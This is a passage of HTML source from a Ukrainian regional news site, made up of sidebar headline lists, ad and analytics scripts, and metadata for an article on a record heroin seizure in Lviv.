				Акции в супермаркетах АТБ с 6 по 12 января			</span>
		</a>
	</li>
	<li itemscope itemtype="https://schema.org/Article">
		<a href="/ukraina/40-obshchestvo/19746-saira-informatsiia-pro-zaboronu-prodazhu-povsiakdennykh-tovariv-pid-chas-karantynu-ne-ie-dostovirnoiu-stepanov" itemprop="url">
			<span itemprop="name">
				Інформація про заборону продажу повсякденних товарів під час карантину не є достовірною - Степанов			</span>
		</a>
	</li>
	<li itemscope itemtype="https://schema.org/Article">
		<a href="/ukraina/40-obshchestvo/19750-saira-yakby-vybory-prezydenta-prokhodyly-zaraz-u-druhomu-turi-zelenskyi-zustrivsia-b-ne-z-poroshenkom-opytuvannia" itemprop="url">
			<span itemprop="name">
				Якби вибори президента проходили зараз, у другому турі Зеленський зустрівся б не з Порошенком - опитування			</span>
		</a>
	</li>
	<li itemscope itemtype="https://schema.org/Article">
		<a href="/ukraina/44-ekonomika/19749-saira-elektrychne-opalennia-podorozhchaie-vdvichi-iakymy-budut-novi-taryfy" itemprop="url">
			<span itemprop="name">
				Електричне опалення подорожчає вдвічі: якими будуть нові тарифи			</span>
		</a>
	</li>
</ul>
		</div>
					</div>
									<!-- End Content -->
				</main>
									<div id="aside" class="span3">
						<!-- Begin Right Sidebar -->
											<div class="well .rss"><h3 class="rss">НОВИНИ ДИВОВИЖНОГО СВІТУ</h3>

<!-- JoomlaWorks "Simple RSS Feed Reader" Module (v3.7.0) starts here -->
<div class="srfrContainer .rss">

  
  <ul class="srfrList">
        <li class="srfrRow srfrRowIsOdd">
            <h3>
                <a target="_blank" href="https://thebest.world/life/otdyh-v-yanvare-2021-spisok-razreshennyh-stran/">
          <img class="srfrImage" src="https://ir0.mobify.com/81/https://thebest.world/wp-content/uploads/198237-360x240.jpg" alt="Отдых в январе 2021 &ndash; список разрешенных стран" />
        </a>
        					<a target="_blank" href="https://thebest.world/life/otdyh-v-yanvare-2021-spisok-razreshennyh-stran/">Отдых в январе 2021 &ndash; список разрешенных стран</a></h3>
      
      
      
            <p>


              </p>
      
      
      <div class="clr"></div>
    </li>
        <li class="srfrRow srfrRowIsEven">
            <h3>
                <a target="_blank" href="https://thebest.world/medinfo/novaya-erogennaya-zona-ljudi-stali-poluchat-udovolstvie-ot-pcr-testirovaniya/">
          <img class="srfrImage" src="https://ir0.mobify.com/81/https://thebest.world/wp-content/uploads/RIAN_6302466.HR-pic905-895x505-45136-360x240.jpg" alt="Новая эрогенная зона &ndash; люди стали получать удовольствие от ПЦР-тестирования" />
        </a>
        					<a target="_blank" href="https://thebest.world/medinfo/novaya-erogennaya-zona-ljudi-stali-poluchat-udovolstvie-ot-pcr-testirovaniya/">Новая эрогенная зона &ndash; люди стали получать удовольствие от ПЦР-тестирования</a></h3>
      
      
      
            <p>


              </p>
      
      
      <div class="clr"></div>
    </li>
        <li class="srfrRow srfrRowIsOdd">
            <h3>
                <a target="_blank" href="https://thebest.world/trash/nadejus-v-raju-ne-budet-sverhurochnyh-napisala-pered-smertju-devushkaya-umershaya-iz-za-raboty-bez-vyhodnyh/">
          <img class="srfrImage" src="https://ir0.mobify.com/81/https://thebest.world/wp-content/uploads/devushka7-e1442308060285-360x240.jpg" alt="&ldquo;Надеюсь в Раю не будет сверхурочных&rdquo; &ndash; написала перед смертью девушкая, умершая из-за работы без выходных" />
        </a>
        					<a target="_blank" href="https://thebest.world/trash/nadejus-v-raju-ne-budet-sverhurochnyh-napisala-pered-smertju-devushkaya-umershaya-iz-za-raboty-bez-vyhodnyh/">&ldquo;Надеюсь в Раю не будет сверхурочных&rdquo; &ndash; написала перед смертью девушкая, умершая из-за работы без выходных</a></h3>
      
      
      
            <p>


              </p>
      
      
      <div class="clr"></div>
    </li>
        <li class="srfrRow srfrRowIsEven">
            <h3>
                <a target="_blank" href="https://thebest.world/life/potryasajushhee-zrelishhe-stolica-ukrainy-s-vysoty-786-km-video/">
          <img class="srfrImage" src="https://ir0.mobify.com/81/https://thebest.world/wp-content/uploads/203475-360x240.jpg" alt="Потрясающее зрелище &ndash; столица Украины с высоты 786 км (видео)" />
        </a>
        					<a target="_blank" href="https://thebest.world/life/potryasajushhee-zrelishhe-stolica-ukrainy-s-vysoty-786-km-video/">Потрясающее зрелище &ndash; столица Украины с высоты 786 км (видео)</a></h3>
      
      
      
            <p>


              </p>
      
      
      <div class="clr"></div>
    </li>
        <li class="srfrRow srfrRowIsOdd">
            <h3>
                <a target="_blank" href="https://thebest.world/favorites/hudozhnica-obratilas-k-prezidentu-pokazav-emu-33-h-metrovuju-vaginu-foto/">
          <img class="srfrImage" src="https://ir0.mobify.com/81/https://thebest.world/wp-content/uploads/134483495_10219401785291644_7422827326467702219_o-360x240.jpg" alt="Художница обратилась к Президенту показав ему 33-х метровую вагину (фото)" />
        </a>
        					<a target="_blank" href="https://thebest.world/favorites/hudozhnica-obratilas-k-prezidentu-pokazav-emu-33-h-metrovuju-vaginu-foto/">Художница обратилась к Президенту показав ему 33-х метровую вагину (фото)</a></h3>
      
      
      
            <p>


              </p>
      
      
      <div class="clr"></div>
    </li>
      </ul>

  
  </div>

<div class="clr"></div>

<!-- JoomlaWorks "Simple RSS Feed Reader" Module (v3.7.0) ends here -->

</div><div class="well hitstop"><h3 class="page-header">Останні новини</h3><div class="junewsultra hitstop">
			<div class="jn">
			<div class="jn-head">
				<div class="jn-left">
											<picture><source srcset="img/81x54/2/a-faaf9175.jpg.webp" type="image/webp"><a href="/ukraina/44-ekonomika/19760-spisok-tovariv-yakimi-mozhna-torguvati-pid-chas-lokdaunu-rozshirili-zmi" title="Список товарів, якими можна торгувати під час локдауну, розширили – ЗМІ"><img loading="lazy" src="img/81x54/2/563-df2883f4.jpg" alt="Список товарів, якими можна торгувати під час локдауну, розширили – ЗМІ" class="ampmetaimage smartresize" ></a></picture>									</div>
				<div class="jn-right">
											<h4>
							<a href="/ukraina/44-ekonomika/19760-spisok-tovariv-yakimi-mozhna-torguvati-pid-chas-lokdaunu-rozshirili-zmi">
								Список товарів, якими можна торгувати під час локдауну, розширили – ЗМІ							</a>
						</h4>
										<div class="jn-info">
																													</div>
				</div>
			</div>
								</div>
			<div class="jn">
			<div class="jn-head">
				<div class="jn-left">
											<picture><source srcset="img/81x54/2/a-faaf9175.jpg.webp" type="image/webp"><a href="/region/25-proisshestviya/19759-saira-bilshe-tonny-u-lvovi-vyluchyly-rekordnu-partiiu-heroinu-foto" title="Більше тонни: у Львові вилучили рекордну партію героїну (фото)"><img loading="lazy" src="img/81x54/0/4241212222525425212121-420d824b.jpg" alt="Більше тонни: у Львові вилучили рекордну партію героїну (фото)" class="ampmetaimage smartresize" ></a></picture>									</div>
				<div class="jn-right">
											<h4>
							<a href="/region/25-proisshestviya/19759-saira-bilshe-tonny-u-lvovi-vyluchyly-rekordnu-partiiu-heroinu-foto">
								Більше тонни: у Львові вилучили рекордну партію героїну (фото)							</a>
						</h4>
										<div class="jn-info">
																													</div>
				</div>
			</div>
								</div>
			<div class="jn">
			<div class="jn-head">
				<div class="jn-left">
											<picture><source srcset="img/81x54/2/a-faaf9175.jpg.webp" type="image/webp"><a href="/ukraina/43-politika/19757-saira-novorichne-pryvitannia-zelenskoho-v-op-zapevnyly-shcho-ziomky-z-ditmy-vidbuvalysia-zakonno" title="Новорічне привітання Зеленського: в ОП запевнили, що зйомки з дітьми відбувалися законно"><img loading="lazy" src="img/81x54/a/32225266633333223-bd0f2117.jpg" alt="Новорічне привітання Зеленського: в ОП запевнили, що зйомки з дітьми відбувалися законно" class="ampmetaimage smartresize" ></a></picture>									</div>
				<div class="jn-right">
											<h4>
							<a href="/ukraina/43-politika/19757-saira-novorichne-pryvitannia-zelenskoho-v-op-zapevnyly-shcho-ziomky-z-ditmy-vidbuvalysia-zakonno">
								Новорічне привітання Зеленського: в ОП запевнили, що зйомки з дітьми відбувалися законно							</a>
						</h4>
										<div class="jn-info">
																													</div>
				</div>
			</div>
								</div>
			<div class="jn">
			<div class="jn-head">
				<div class="jn-left">
											<picture><source srcset="img/81x54/2/a-faaf9175.jpg.webp" type="image/webp"><a href="/ukraina/40-obshchestvo/19756-saira-ksu-vydav-novu-zaiavu-shchodo-ukazu-zelenskoho-pro-vidstoronennia-tupytskoho" title="КСУ видав нову заяву щодо указу Зеленського про відсторонення Тупицького"><img loading="lazy" src="img/81x54/6/5322212221212142121421-6bc51711.jpg" alt="КСУ видав нову заяву щодо указу Зеленського про відсторонення Тупицького" class="ampmetaimage smartresize" ></a></picture>									</div>
				<div class="jn-right">
											<h4>
							<a href="/ukraina/40-obshchestvo/19756-saira-ksu-vydav-novu-zaiavu-shchodo-ukazu-zelenskoho-pro-vidstoronennia-tupytskoho">
								КСУ видав нову заяву щодо указу Зеленського про відсторонення Тупицького							</a>
						</h4>
										<div class="jn-info">
																													</div>
				</div>
			</div>
								</div>
			<div class="jn">
			<div class="jn-head">
				<div class="jn-left">
											<picture><source srcset="img/81x54/2/a-faaf9175.jpg.webp" type="image/webp"><a href="/ukraina/40-obshchestvo/19755-saira-kharkivska-kompaniia-biolik-podala-na-reiestratsiiu-v-ukraini-rosiiskoi-vaktsyny-sputnyk-v" title="Харківська компанія &amp;quot;Біолік&amp;quot; подала на реєстрацію в Україні російської вакцини &amp;quot;Спутник V&amp;quot;"><img loading="lazy" src="img/81x54/4/55452241214215555-41d190fd.jpg" alt="Харківська компанія &amp;quot;Біолік&amp;quot; подала на реєстрацію в Україні російської вакцини &amp;quot;Спутник V&amp;quot;" class="ampmetaimage smartresize" ></a></picture>									</div>
				<div class="jn-right">
											<h4>
							<a href="/ukraina/40-obshchestvo/19755-saira-kharkivska-kompaniia-biolik-podala-na-reiestratsiiu-v-ukraini-rosiiskoi-vaktsyny-sputnyk-v">
								Харківська компанія &quot;Біолік&quot; подала на реєстрацію в Україні російської вакцини &quot;Спутник V&quot;							</a>
						</h4>
										<div class="jn-info">
																													</div>
				</div>
			</div>
								</div>
	</div></div>
										<div class="modright">
<div id="Pi99S9jgcq57V9jrjhsQ" data-type="2" class="blockOfO1b2l3" ></div>
</div>								<script defer src="https://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>
<!-- В статью квадратный адаптивный -->
<ins class="adsbygoogle"
   style="display:block"
   data-ad-client="ca-pub-4305834550386423"
   data-ad-slot="9583942834"
   data-ad-format="auto"
   data-full-width-responsive="true"></ins>
<script>
   (adsbygoogle = window.adsbygoogle || []).push({});
</script>
<amp-ad width="100vw" height="320"
   type="adsense"
   data-ad-client="ca-pub-4305834550386423"
   data-ad-slot="9583942834"
   data-auto-format="rspv"
   data-full-width="">
 <div overflow=""></div>
</amp-ad>
<p><a href="https://besplatka.ua" rel="alternate noopener" target="_blank"><img alt="besplatka" src="/images/banners/besplatka.png" style="margin-left: auto; margin-right: auto; display: block;" /></a></p>

<div class="modright">
<div id="CtcIZVFUT8VgRY8jRoQM" data-type="2" class="blockOfO1b2l3" ></div>
</div>

<!-- before </body> -->



											<div class="well hitstop"><h3 class="page-header">Найпопулярніше</h3><div class="junewsultra hitstop">
			<div class="jn">
			<div class="jn-head">
				<div class="jn-left">
											<a href="/ukraina/40-obshchestvo/19731-saira-z-8-sichnia-u-supermarketakh-zaboroniat-prodazh-nyzky-povsiakdennykh-tovariv" title="З 8 січня у супермаркетах заборонять продаж низки повсякденних товарів"><img src="img/81x54/6/11121252555252121-d34f7e07.jpg" alt="З 8 січня у супермаркетах заборонять продаж низки повсякденних товарів" class="ampmetaimage smartresize" ></a>									</div>
				<div class="jn-right">
											<h4>
							<a href="/ukraina/40-obshchestvo/19731-saira-z-8-sichnia-u-supermarketakh-zaboroniat-prodazh-nyzky-povsiakdennykh-tovariv">
								З 8 січня у супермаркетах заборонять продаж низки повсякденних товарів							</a>
						</h4>
										<div class="jn-info">
																													</div>
				</div>
			</div>
								</div>
			<div class="jn">
			<div class="jn-head">
				<div class="jn-left">
											<a href="/ukraina/40-obshchestvo/19724-kilkist-vipadkiv-koronavirusu-v-ukrajini-na-4-sichnya" title="Кількість випадків коронавірусу в Україні на 4 січня"><img src="img/81x54/1/89010-b7906eb6.jpg" alt="Кількість випадків коронавірусу в Україні на 4 січня" class="ampmetaimage smartresize" ></a>									</div>
				<div class="jn-right">
											<h4>
							<a href="/ukraina/40-obshchestvo/19724-kilkist-vipadkiv-koronavirusu-v-ukrajini-na-4-sichnya">
								Кількість випадків коронавірусу в Україні на 4 січня							</a>
						</h4>
										<div class="jn-info">
																													</div>
				</div>
			</div>
								</div>
			<div class="jn">
			<div class="jn-head">
				<div class="jn-left">
											<a href="/ukraina/40-obshchestvo/19714-kilkist-novikh-vipadkiv-koronavirusu-v-ukrajini-na-3-sichnya" title="Кількість нових випадків коронавірусу в Україні на 3 січня"><img src="img/81x54/4/foto7-83206db6.jpg" alt="Кількість нових випадків коронавірусу в Україні на 3 січня" class="ampmetaimage smartresize" ></a>									</div>
				<div class="jn-right">
											<h4>
							<a href="/ukraina/40-obshchestvo/19714-kilkist-novikh-vipadkiv-koronavirusu-v-ukrajini-na-3-sichnya">
								Кількість нових випадків коронавірусу в Україні на 3 січня							</a>
						</h4>
										<div class="jn-info">
																													</div>
				</div>
			</div>
								</div>
			<div class="jn">
			<div class="jn-head">
				<div class="jn-left">
											<a href="/ukraina/40-obshchestvo/19719-lokdaun-u-sichni-shcho-zaboronyat-i-chi-e-virogidnist-skasuvannya" title="Локдаун у січні: що заборонять і чи є вірогідність скасування?"><img src="img/81x54/3/1ca2bd22c4ea5ba09f181f2d922ee389-58f518c7.jpg" alt="Локдаун у січні: що заборонять і чи є вірогідність скасування?" class="ampmetaimage smartresize" ></a>									</div>
				<div class="jn-right">
											<h4>
							<a href="/ukraina/40-obshchestvo/19719-lokdaun-u-sichni-shcho-zaboronyat-i-chi-e-virogidnist-skasuvannya">
								Локдаун у січні: що заборонять і чи є вірогідність скасування?							</a>
						</h4>
										<div class="jn-info">
																													</div>
				</div>
			</div>
								</div>
			<div class="jn">
			<div class="jn-head">
				<div class="jn-left">
											<a href="/ukraina/45-zhkkh/19718-zelenskij-rozpoviv-yak-ukrajintsi-mozhut-zmenshiti-na-40-platizhki-za-gaz" title="Зеленський розповів, як українці можуть зменшити на 40% платіжки за газ"><img src="img/81x54/b/6787-199e8068.jpg" alt="Зеленський розповів, як українці можуть зменшити на 40% платіжки за газ" class="ampmetaimage smartresize" ></a>									</div>
				<div class="jn-right">
											<h4>
							<a href="/ukraina/45-zhkkh/19718-zelenskij-rozpoviv-yak-ukrajintsi-mozhut-zmenshiti-na-40-platizhki-za-gaz">
								Зеленський розповів, як українці можуть зменшити на 40% платіжки за газ							</a>
						</h4>
										<div class="jn-info">
																													</div>
				</div>
			</div>
								</div>
	</div></div>
						<!-- End Right Sidebar -->
					</div>
							</div>
		</div>
	</div>


	<!-- Footer -->
	<footer class="footer" role="contentinfo">
		<div class="container">
<div class="containercopi">
<h3>Новини України <strong>NNS</strong> ("Національна служба новин")</h3>
Адреса редакції:&nbsp;Україна, Дніпропетровська обл., Нікополь<br />
E-mail:<a href="mailto:nikopol.net@ukr.net">&nbsp;nikopol.net@ukr.net</a></p>
</div>
		</div>
	</footer>


  		<link rel="stylesheet" href="/plugins/content/smartresizer/smartresizer.css" />
	<style type="text/css">
.pager.pagenav{display:none;}
	body.site {
		border-top: 3px solid #29475d;
		background-color: #ffffff;
	}
	a {
		color: #29475d;
	}
	.nav-list > .active > a,
	.nav-list > .active > a:hover,
	.dropdown-menu li > a:hover,
	.dropdown-menu .active > a,
	.dropdown-menu .active > a:hover,
	.nav-pills > .active > a,
	.nav-pills > .active > a:hover,
	.btn-primary {
		background: #29475d;
	}
	</style>
	<script src="https://nikopolnews.net/templates/protostar/js/infinite-scroll.pkgd.js"></script>
	<script type="text/javascript">
jQuery(function($){$("#forajax").parent().append("<center id=\"infiniteScroll-loading-message\"><p class=\"infinite-scroll-request\"><b>Loading...</b></p><p class=\"infinite-scroll-last\"></p>");});
	jQuery(function ($) {
		var infiniteScrollArticle = jQuery('#forajax').infiniteScroll({
		path: function() {
			var pageNumber = this.loadCount
			return jQuery('.pagination__next:eq(' + pageNumber +')').attr('href');
		},
			append: 'article.item',
			history: 'push',
			hideNav: '.pager.pagenav',
			status: '#infiniteScroll-loading-message'

		});
		infiniteScrollArticle.on( 'load.infiniteScroll', function( event, response ) {
			var posts = jQuery( response ).find('#forajax article.item');
			posts.imagesLoaded( function() {
			  infiniteScrollArticle.infiniteScroll( 'appendItems', posts );
			});
		});
	});

					</script>
	<script type="application/ld+json">{"@context":"https:\/\/schema.org","@type":"WebPage","name":"\u0411\u0456\u043b\u044c\u0448\u0435 \u0442\u043e\u043d\u043d\u0438: \u0443 \u041b\u044c\u0432\u043e\u0432\u0456 \u0432\u0438\u043b\u0443\u0447\u0438\u043b\u0438 \u0440\u0435\u043a\u043e\u0440\u0434\u043d\u0443 \u043f\u0430\u0440\u0442\u0456\u044e \u0433\u0435\u0440\u043e\u0457\u043d\u0443 (\u0444\u043e\u0442\u043e)","speakable":{"@type":"SpeakableSpecification","xpath":["\/html\/head\/title","\/html\/head\/meta[@name='description']\/@content"]},"url":"https:\/\/nikopolnews.net\/region\/25-proisshestviya\/19759-saira-bilshe-tonny-u-lvovi-vyluchyly-rekordnu-partiiu-heroinu-foto"}</script>
	<script type="application/ld+json">{"@context":"https:\/\/schema.org","@type":"NewsArticle","headline":"\u0411\u0456\u043b\u044c\u0448\u0435 \u0442\u043e\u043d\u043d\u0438: \u0443 \u041b\u044c\u0432\u043e\u0432\u0456 \u0432\u0438\u043b\u0443\u0447\u0438\u043b\u0438 \u0440\u0435\u043a\u043e\u0440\u0434\u043d\u0443 \u043f\u0430\u0440\u0442\u0456\u044e \u0433\u0435\u0440\u043e\u0457\u043d\u0443 (\u0444\u043e\u0442\u043e)","name":"\u0411\u0456\u043b\u044c\u0448\u0435 \u0442\u043e\u043d\u043d\u0438: \u0443 \u041b\u044c\u0432\u043e\u0432\u0456 \u0432\u0438\u043b\u0443\u0447\u0438\u043b\u0438 \u0440\u0435\u043a\u043e\u0440\u0434\u043d\u0443 \u043f\u0430\u0440\u0442\u0456\u044e \u0433\u0435\u0440\u043e\u0457\u043d\u0443 (\u0444\u043e\u0442\u043e)","articleBody":"\r\n\r\n\u0417\u0430 \u043f\u0440\u043e\u0446\u0435\u0441\u0443\u0430\u043b\u044c\u043d\u043e\u0433\u043e \u043a\u0435\u0440\u0456\u0432\u043d\u0438\u0446\u0442\u0432\u0430 \u041b\u044c\u0432\u0456\u0432\u0441\u044c\u043a\u043e\u0457 \u043e\u0431\u043b\u0430\u0441\u043d\u043e\u0457 \u043f\u0440\u043e\u043a\u0443\u0440\u0430\u0442\u0443\u0440\u0438, \u043f\u0456\u0434 \u0447\u0430\u0441 \u0441\u043f\u0435\u0446\u043e\u043f\u0435\u0440\u0430\u0446\u0456\u0457 \u0432 \u0440\u0430\u043c\u043a\u0430\u0445 \u043a\u0440\u0438\u043c\u0456\u043d\u0430\u043b\u044c\u043d\u043e\u0433\u043e \u043f\u0440\u043e\u0432\u0430\u0434\u0436\u0435\u043d\u043d\u044f \u0437\u0430 \u0444\u0430\u043a\u0442\u043e\u043c \u043a\u043e\u043d\u0442\u0440\u0430\u0431\u0430\u043d\u0434\u0438 \u043d\u0430\u0440\u043a\u043e\u0442\u0438\u0447\u043d\u0438\u0445 \u0437\u0430\u0441\u043e\u0431\u0456\u0432 \u0432\u0438\u043b\u0443\u0447\u0435\u043d\u043e \u0440\u0435\u043a\u043e\u0440\u0434\u043d\u0443 \u043f\u0430\u0440\u0442\u0456\u044e \u0433\u0435\u0440\u043e\u0457\u043d\u0443 \u0432\u0430\u0433\u043e\u044e \u043f\u043e\u043d\u0430\u0434 1 \u0442\u043e\u043d\u043d\u0443, \u043f\u043e\u0432\u0456\u0434\u043e\u043c\u043b\u044f\u0454 \u043f\u0440\u0435\u0441\u0446\u0435\u043d\u0442\u0440 \u041e\u0444\u0456\u0441\u0443 \u0433\u0435\u043d\u043f\u0440\u043e\u043a\u0443\u0440\u043e\u0440\u0430, ","mainEntityOfPage":{"@type":"WebPage","@id":"https:\/\/nikopolnews.net\/region\/25-proisshestviya\/19759-saira-bilshe-tonny-u-lvovi-vyluchyly-rekordnu-partiiu-heroinu-foto"},"thumbnailUrl":"https:\/\/nikopolnews.net\/images\/2020\/4241212222525425212121.jpg","image":{"@type":"ImageObject","url":"https:\/\/nikopolnews.net\/images\/2020\/4241212222525425212121.jpg","height":505,"width":758},"dateCreated":"2021-01-05T17:15:01+02:00","dateModified":"2021-01-05T17:16:44+02:00","datePublished":"2021-01-05T17:16:44+02:00","interactionCount":"154","author":{"@type":"Person","name":"\u041c\u0430\u0440\u0443\u0441\u044f \u041e\u0444\u0444\u043e\u043d"},"publisher":{"@type":"Organization","name":"\u041d\u0430\u0446\u0456\u043e\u043d\u0430\u043b\u044c\u043d\u0430 \u0441\u043b\u0443\u0436\u0431\u0430 \u043d\u043e\u0432\u0438\u043d - \u041d\u043e\u0432\u0438\u043d\u0438 \u0423\u043a\u0440\u0430\u0457\u043d\u0438","logo":{"@type":"ImageObject","url":"https:\/\/nikopolnews.net\/images\/thumbnails\/60060.png","height":60,"width":600}}}</script>

<!-- Global site tag (gtag.js) - Google Analytics -->
<script async src="https://www.googletagmanager.com/gtag/js?id=UA-154914675-1"></script>
<script>
 window.dataLayer = window.dataLayer || [];
 function gtag(){dataLayer.push(arguments);}
 gtag('js', new Date());

 gtag('config', 'UA-154914675-1');
</script>



<script defer src="https://cdn.gravitec.net/storage/8a530aacfdbf04c76aa4a109a54c7fd5/client.js"></script>
<script>
$('p').each(function() {
  var $this = $(this);
  if($this.html().replace(/\s|&nbsp;/g, '').length == 0)
    $this.remove();
});
</script>
<script defer src="/templates/protostar/js/share.js"></script>

</body>
</html>
